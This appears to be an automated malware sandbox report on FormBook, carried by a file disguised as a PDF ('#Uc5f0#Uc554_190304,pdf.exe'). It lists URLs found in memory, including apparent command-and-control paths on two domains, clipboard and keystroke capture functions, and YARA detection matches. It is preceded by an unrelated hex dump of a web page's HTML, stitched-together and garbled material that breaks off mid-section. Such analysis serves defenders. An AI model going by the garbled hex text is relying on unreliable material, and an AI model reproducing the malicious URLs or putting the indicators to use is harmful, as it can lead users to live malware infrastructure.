76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61 72 5f 61 63 74 69 76 65 20 68 74 6d 6c 5f 6d 6f 62 69 6c 65 5f 6d 65 6e 75 5f 70 68 6f 6e 65 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 65 61 72 63 68 69 63 6f 6e 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 75 6e 73 74 69 63 6b 5f 74 6f 70 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 72 65 74 63 68 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 61 76 2d 6f 76 65 72 6c 61 79 2d 66 75 6c 6c 20 68 74 6d 6c 5f 61 76 2d 73 75 62 6d 65 6e 75 2d 6e 6f 63 6c 6f 6e 65 20 61 76 2d 6e 6f 2d 70 72 65 76 69 65 77 20 68 74 6d 6c 5f 74 65 78 74 5f 6d 65 6e 75 5f 61 63 74 69 76 65 20 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 0a 0a 3c 21 2d 2d 20 6d 6f 62 69 6c 65 20 73 65 74 74 69 6e 67 20 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 21 2d 2d 20 53 63 72 69 70 74 73 2f 43 53 53 20 61 6e 64 20 77 70 5f 68 65 61 64 20 68 6f 6f 6b 20 2d 2d 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 45 6c 69 7a 61 76 65 74 61 20 4b 61 6c 69 6e 69 6e 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 6
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000003.00000000.1167784770.0000000003230000.00000004.00000001.sdmp String found in binary or memory: http://ns.microsoftom/photo/1.2/tD Source: explorer.exe, 00000003.00000002.1791418593.00000000030D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmp String found in binary or memory: http://www.elizavetakalinina.com Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmp String found in binary or memory: http://www.elizavetakalinina.com/6dk/ Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: chkdsk.exe, 00000004.00000002.1792598460.00000000060FF000.00000004.00000001.sdmp String found in binary or memory: https://www.sweetandsunny.com/6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH

 Contains functionality to read the clipboard data Show sources
 Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 0_2_00420B44 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00420B44
 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe Code function: 0_2_0043E138 GetKeyboardState, 2.0043e+142

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources